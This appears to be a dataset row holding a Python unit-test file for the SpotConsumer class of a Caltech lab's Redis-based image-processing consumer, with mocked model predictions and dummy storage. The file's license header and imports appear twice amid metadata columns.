] | null | null | null | # Copyright 2016-2022 The Van Valen Lab at the California Institute of
# Technology (Caltech), with support from the Paul Allen Family Foundation,
# Google, & National Institutes of Health (NIH) under Grant U24CA224309-01.
# All rights reserved.
#
# Licensed under a modified Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.github.com/vanvalenlab/kiosk-redis-consumer/LICENSE
#
# The Work provided may be used for non-commercial academic purposes only.
# For any other use of the Work, including commercial use, please contact:
# vanvalenlab@gmail.com
#
# Neither the name of Caltech nor the names of its contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for SpotDetectionConsumer"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from redis_consumer import consumers
from redis_consumer.testing_utils import Bunch
from redis_consumer.testing_utils import DummyStorage
from redis_consumer.testing_utils import redis_client
# pylint: disable=R0201,W0621
| 38.869565 | 86 | 0.675615 | # Copyright 2016-2022 The Van Valen Lab at the California Institute of
# Technology (Caltech), with support from the Paul Allen Family Foundation,
# Google, & National Institutes of Health (NIH) under Grant U24CA224309-01.
# All rights reserved.
#
# Licensed under a modified Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.github.com/vanvalenlab/kiosk-redis-consumer/LICENSE
#
# The Work provided may be used for non-commercial academic purposes only.
# For any other use of the Work, including commercial use, please contact:
# vanvalenlab@gmail.com
#
# Neither the name of Caltech nor the names of its contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for SpotDetectionConsumer"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from redis_consumer import consumers
from redis_consumer.testing_utils import Bunch
from redis_consumer.testing_utils import DummyStorage
from redis_consumer.testing_utils import redis_client
class TestSpotConsumer(object):
# pylint: disable=R0201,W0621
def test__consume_finished_status(self, redis_client):
queue = 'q'
storage = DummyStorage()
consumer = consumers.SpotConsumer(redis_client, storage, queue)
empty_data = {'input_file_name': 'file.tiff'}
test_hash = 0
# test finished statuses are returned
for status in (consumer.failed_status, consumer.final_status):
test_hash += 1
data = empty_data.copy()
data['status'] = status
redis_client.hmset(test_hash, data)
result = consumer._consume(test_hash)
assert result == status
result = redis_client.hget(test_hash, 'status')
assert result == status
test_hash += 1
def test__consume(self, mocker, redis_client):
# pylint: disable=W0613
queue = 'spot'
storage = DummyStorage()
consumer = consumers.SpotConsumer(redis_client, storage, queue)
empty_data = {'input_file_name': 'file.tiff'}
output_shape = (1, 32, 2)
mock_app = Bunch(
predict=lambda *x, **y: np.random.randint(1, 5, size=output_shape),
model=Bunch(
get_batch_size=lambda *x: 1,
input_shape=(1, 32, 32, 1)
)
)
mocker.patch.object(consumer, 'get_grpc_app', lambda *x, **_: mock_app)
mocker.patch.object(consumer, 'get_image_scale', lambda *x, **_: 1)
mocker.patch.object(consumer, 'validate_model_input', lambda *x, **_: x[0])
mocker.patch.object(consumer, 'detect_dimension_order', lambda *x, **_: 'YXC')
test_hash = 'some hash'
redis_client.hmset(test_hash, empty_data)
result = consumer._consume(test_hash)
assert result == consumer.final_status
result = redis_client.hget(test_hash, 'status')
assert result == consumer.final_status
| 1,837 | 10 | 77 |